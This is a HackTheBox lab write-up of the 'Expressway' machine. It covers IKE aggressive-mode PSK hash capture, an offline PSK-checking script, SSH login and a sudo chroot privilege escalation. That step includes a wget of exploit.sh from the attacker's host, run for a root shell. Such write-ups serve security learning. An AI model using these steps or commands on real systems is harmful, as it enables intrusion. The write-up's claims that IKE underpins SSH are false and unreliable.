Expressway Writeup (HackTheBox Easy Machine)


Overview

Expressway is an easy Linux machine from HackTheBox. This box is very straightforward and may seem too easy to experienced hackers, but it still touches on some interesting topics.

We start with a classic port scan and discover an IKE service on UDP port 500. While enumerating this service, we obtain the PSK hash. We crack it and use the recovered password to log in via SSH.

Once inside, we identify an old sudo version and find out that it’s vulnerable. We exploit the weakness and get a root shell with full access.


Nmap scan

Starting with the Nmap scan.

┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -A 10.10.11.87 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-17 18:17 CEST
Nmap scan report for 10.10.11.87
Host is up (0.024s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Device type: general purpose|router|phone|storage-misc|media device
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (96%), Google Android 10.X (94%), HP embedded (93%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:google:android:10 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 2.6.32 - 3.13 (96%), Linux 5.0 - 5.14 (96%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (96%), Linux 5.0 (95%), OpenWrt 22.03 (Linux 5.10) (95%), Android 9 - 10 (Linux 4.9 - 4.14) (94%), Linux 3.2 - 4.14 (94%), Linux 2.6.32 - 3.10 (93%), HP P2000 G3 NAS device (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 23.31 ms 10.10.14.1
2 23.28 ms 10.10.11.87

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds

The Nmap scan showed one open port: 22 for SSH. Immediately, it struck me as weird to have only SSH active on the machine, so let’s perform more enumeration.

┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -sU -A -p 500 10.10.11.87 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-17 18:34 CEST
Nmap scan report for 10.10.11.87
Host is up (0.024s latency).

PORT STATE SERVICE VERSION
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 500/udp)
HOP RTT ADDRESS
1 23.71 ms 10.10.14.1
2 ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.83 seconds

Additionally, I performed a UDP scan with Nmap and found out that port 500/udp is open too. Since I didn’t know anything about this port or the service it’s hosting, I did some research.


IKE enumeration (port 500/udp)

UDP port 500 is primarily used by IPsec VPNs for the Internet Key Exchange (IKE) protocol, which is the initial phase for establishing a secure communication channel. (Gemini)

I did some digging and found this article on IKE pentesting: https://www.verylazytech.com/network-pentesting/ipsec-ike-vpn-port-500-udp. It takes information from HackTricks and covers everything from enumeration and fingerprinting to intercepting traffic and exploitation of weak configurations.


I learnt that I can use the “ike-scan” tool to fingerprint the VPN system. The output gives us several important pieces of information.

┌──(root㉿kali)-[/home/kali]
└─# ike-scan -M -A 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=8078951d37b747fa)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.044 seconds (22.54 hosts/sec). 1 returned handshake; 0 returned notify

Firstly, we get the user ID “ike” and the domain “expressway.htb”. Secondly, we learn that aggressive mode is enabled, which means the VPN may leak the group name and be vulnerable to credential brute-force attacks.

Since aggressive mode is enabled, we can also grab the PSK hash.

┌──(root㉿kali)-[/home/kali]
└─# ike-scan -A --pskcrack 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=9ad4876029aa0dfc)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)

IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
dfb1792200ea6feda144568d315e8fc1bffc5387ca5f3409e541fa60190bf81939a30327fe952d3ed841013f5de184a0af14451bbf9b190a3072ac95c57a0f2e464870b597a32ddcbbcd7067788695c4475bef620bd3ebc98c7968665dc7719daa961f34b6c27d8202196730f0e920a2ca395385c98fecb9f2094b7e552df91e:ca00352b1ab93d7690dd654473d4e0ddbc10aba8e67e5a8a231b5980543e08bdb2402c306fbee1d42353bf9128eb6ccace4603cab686d5ca1204c59d046b1219e003d76952d1fe0c9edc2dc34c86c0eed5cd87b2767dac72ae9f90a197f5da2beccc54373fe823234cf9929368fb4156d6465da1259f4e276c74513174ed41c7:9ad4876029aa0dfc:091eb9970456e80b:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:74076e54b2d9e5b6f676651ce139f554bc130a01:0d15a32e18b90504f00a37300f277341033a957ead380080204a90c53000abe6:73f97132d3bdb54e83de9cb5e8e9cc686ee693c7
Ending ike-scan 1.9.6: 1 hosts scanned in 0.038 seconds (26.50 hosts/sec). 1 returned handshake; 0 returned notify

A PSK (Pre-Shared Key) is a secret which must be exchanged at the start of the communication in order to create a secret channel between the two endpoints (e.g. connecting via SSH).
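The parameter line printed by ike-scan contains everything the responder sent in the clear; only the PSK itself is missing, which is why a candidate key can be checked offline without touching the VPN again. The following added example (my own code, not ike-scan’s or Hashcat’s) shows that check: it parses a line in the same colon-separated format, rebuilds the RFC 2409 aggressive-mode HASH_R for a candidate PSK and compares it with the captured hash_r. The sample line is constructed from random values plus the ID payload shown on the page, not the real capture.

```python
import hashlib
import hmac
import os

# Field order of one ike-scan "--pskcrack" line, exactly as labelled on the page.
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def parse_pskcrack_line(line):
    """Split a colon-separated ike-scan PSK parameter line into raw bytes per field."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError("expected %d fields, got %d" % (len(FIELDS), len(parts)))
    return dict(zip(FIELDS, (bytes.fromhex(p) for p in parts)))


def hash_r_for_psk(psk, p):
    """RFC 2409 aggressive-mode responder hash, with HMAC-SHA1 as the prf (Hash=SHA1 in the SA)."""
    # SKEYID = prf(pre-shared-key, Ni_b | Nr_b): the PSK is the only secret input.
    skeyid = hmac.new(psk, p["ni_b"] + p["nr_b"], hashlib.sha1).digest()
    # HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b): all public values.
    msg = p["g_xr"] + p["g_xi"] + p["cky_r"] + p["cky_i"] + p["sai_b"] + p["idir_b"]
    return hmac.new(skeyid, msg, hashlib.sha1).digest()


def psk_matches(psk, p):
    """True when the candidate PSK reproduces the hash_r the responder sent."""
    return hmac.compare_digest(hash_r_for_psk(psk, p), p["hash_r"])


def make_sample_line(psk):
    """Constructed sample line: random public values, hash_r derived from the given PSK."""
    p = {
        "g_xr": os.urandom(128), "g_xi": os.urandom(128),   # 1024-bit DH values (modp1024)
        "cky_r": os.urandom(8), "cky_i": os.urandom(8),     # ISAKMP cookies
        "sai_b": os.urandom(152),                           # initiator SA payload body
        # ID_USER_FQDN (type 3) + "ike@expressway.htb", the IDir payload shown on the page
        "idir_b": bytes([3, 0, 0, 0]) + b"ike@expressway.htb",
        "ni_b": os.urandom(32), "nr_b": os.urandom(32),     # nonces
    }
    p["hash_r"] = hash_r_for_psk(psk, p)
    return ":".join(p[f].hex() for f in FIELDS)


if __name__ == "__main__":
    sample = parse_pskcrack_line(make_sample_line(b"constructed-secret"))
    print("right key:", psk_matches(b"constructed-secret", sample))
    print("wrong key:", psk_matches(b"guess", sample))
```

The same derivation is what Hashcat’s IKE-PSK SHA1 mode evaluates per guess; disabling aggressive mode (or moving away from PSK authentication) is what removes the offline-crackable material from the wire.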


Cracking Pre-Shared Key hash & getting user flag

Just like any hash, we can try to crack it using our favourite cracking tools. I used Hashcat for GPU-accelerated cracking, which was successful.

Hashcat cracked the PSK hash

Awesome! Now we have all the information we need. Using the cracked password and the user “ike” we discovered earlier, we can log in via SSH. The user flag waits in ike’s home directory.

┌──(root㉿kali)-[/home/kali]
└─# ssh ike@10.10.11.87
ike@10.10.11.87's password:

ike@expressway:~$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:~$ ls -la
total 32
drwx------ 4 ike ike 4096 Sep 16 10:23 .
drwxr-xr-x 3 root root 4096 Aug 14 22:48 ..
lrwxrwxrwx 1 root root 9 Aug 29 14:57 .bash_history -> /dev/null
-rw-r--r-- 1 ike ike 220 May 18 22:58 .bash_logout
-rw-r--r-- 1 ike ike 3526 Aug 28 12:49 .bashrc
drwxr-xr-x 3 ike ike 4096 Aug 28 12:29 .local
-rw-r--r-- 1 ike ike 807 May 18 22:58 .profile
drwx------ 2 ike ike 4096 Sep 16 10:21 .ssh
-rw-r----- 1 root ike 33 Aug 14 22:48 user.txt


Exploiting vulnerable “sudo” version & getting root flag

As usual, I went down my Linux priv esc checklist. One of the first things I check is my user’s sudo privileges. This time, it didn’t have any. Another useful thing to check is the version of “sudo” itself.

ike@expressway:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

For security reasons, the password you type will not be visible.

Password:
Sorry, user ike may not run sudo on expressway.

ike@expressway:~$ sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17

It’s always good practice to google the version information you collect, because you never know whether that version is vulnerable. So I researched sudo version “1.9.17” and found this GitHub repo (https://github.com/kh4sh3i/CVE-2025-32463) with an exploit for a critical vulnerability that gives users immediate root privileges.

The flaw affects the sudo program (versions before 1.9.17p1) and allows a local user to escalate privileges to root. It involves misuse of the “--chroot” (or “-R”) option in sudo. Specifically, sudo can be tricked into loading a malicious “/etc/nsswitch.conf” file from a user-controlled directory when using “--chroot”. (ChatGPT)

The exploit creates a fake user-controlled directory and compiles a malicious library that runs “/bin/bash” as root. Then it runs a “sudo -R” command, which loads our library and gives us a root shell.
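To make the version check repeatable across a fleet, here is an added example (my own code, not from the linked repo) that parses the “sudo --version” output shown above and compares it against the 1.9.17p1 fix, handling sudo’s “pN” patch-level suffix so that 1.9.17 sorts below 1.9.17p1 and 1.9.18 sorts above it. The 1.9.14 lower bound is my assumption from the upstream advisory (the --chroot option first appeared in that release), not something the page states.

```python
import re

# Matches the first line of `sudo --version`, e.g. "Sudo version 1.9.17" or "Sudo version 1.9.17p1".
_VERSION_RE = re.compile(r"Sudo version\s+(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

# Fixed release named on the page for CVE-2025-32463.
FIXED = (1, 9, 17, 1)
# Assumption (upstream advisory, not the page): --chroot, and thus the bug, first shipped in 1.9.14.
INTRODUCED = (1, 9, 14, 0)


def parse_sudo_version(output):
    """Return (major, minor, patch, plevel) from `sudo --version` text; plevel is 0 when absent."""
    m = _VERSION_RE.search(output)
    if not m:
        raise ValueError("no 'Sudo version x.y.z' line found")
    major, minor, patch, plevel = m.groups()
    # Tuple comparison gives the right order: 1.9.17 < 1.9.17p1 < 1.9.18.
    return (int(major), int(minor), int(patch), int(plevel or 0))


def chroot_option_vulnerable(output):
    """True when the installed sudo falls in the CVE-2025-32463 window [1.9.14, 1.9.17p1)."""
    return INTRODUCED <= parse_sudo_version(output) < FIXED


if __name__ == "__main__":
    # Constructed input mirroring the box's output.
    banner = "Sudo version 1.9.17\nSudoers policy plugin version 1.9.17\n"
    print(parse_sudo_version(banner), "vulnerable:", chroot_option_vulnerable(banner))
```

Patching to 1.9.17p1 or later is the fix; where that is delayed, the advisory’s mitigation is to disable the chroot feature in sudoers, which this check does not inspect.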


I cloned the repo and transferred the exploit to the target machine via my Python server. After that, I just marked it as executable and ran it. The “woot!” message appeared and I had the Root shell.

ike@expressway:/tmp$ wget http://10.10.14.123:9000/exploit.sh
--2025-10-18 15:59:26-- http://10.10.14.123:9000/exploit.sh
Connecting to 10.10.14.123:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 637 [text/x-sh]
Saving to: ‘exploit.sh’

exploit.sh 100%[====================================================================================================================================================================================================>] 637 --.-KB/s in 0.001s

2025-10-18 15:59:26 (588 KB/s) - ‘exploit.sh’ saved [637/637]

ike@expressway:/tmp$ chmod +x exploit.sh
ike@expressway:/tmp$ ./exploit.sh
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
root@expressway:/# cd /root
root@expressway:/root# ls -la
total 44
drwx------ 6 root root 4096 Oct 18 15:33 .
drwxr-xr-x 18 root root 4096 Sep 16 16:02 ..
lrwxrwxrwx 1 root root 9 Aug 29 14:57 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwx------ 3 root root 4096 Sep 16 16:02 .config
drwx------ 3 root root 4096 Sep 16 16:02 .gnupg
-rw------- 1 root root 20 Sep 16 15:51 .lesshst
drwxr-xr-x 3 root root 4096 Sep 16 16:02 .local
lrwxrwxrwx 1 root root 9 Sep 16 10:24 .mariadb_history -> /dev/null
-rw-r--r-- 1 root root 132 May 12 20:25 .profile
-rw-r----- 1 root root 33 Oct 18 15:33 root.txt
-rw-r--r-- 1 root root 66 May 23 21:49 .selected_editor
drwx------ 2 root root 4096 Sep 16 16:02 .ssh

Root flag sits patiently in the “/root” directory, and that’s the Expressway machine done.


Summary & final thoughts

Expressway is an easy Linux machine from HackTheBox. This box exposes us to the Internet Key Exchange (IKE) protocol, which is an often overlooked but very important service. It’s essential for other secure protocols like SSH, because it handles the initial key exchange. After discovering that port 500/udp is open, we performed IKE enumeration. Since we found aggressive mode enabled, we could dump the PSK hash and crack it offline. After getting the password and logging in via SSH, we found an unpatched sudo version, which let us escalate our privileges to root using an exploit.

Despite the fact that this machine can be completed in just a couple of minutes, I think it does a great job of exposing such an unpopular (but important) protocol. After successful IKE enumeration, we get another very simple sudo exploit. I had fun learning a new methodology for a protocol I had never seen before. I’d recommend this machine to any beginner/intermediate hacker, solely because of the unique playthrough.
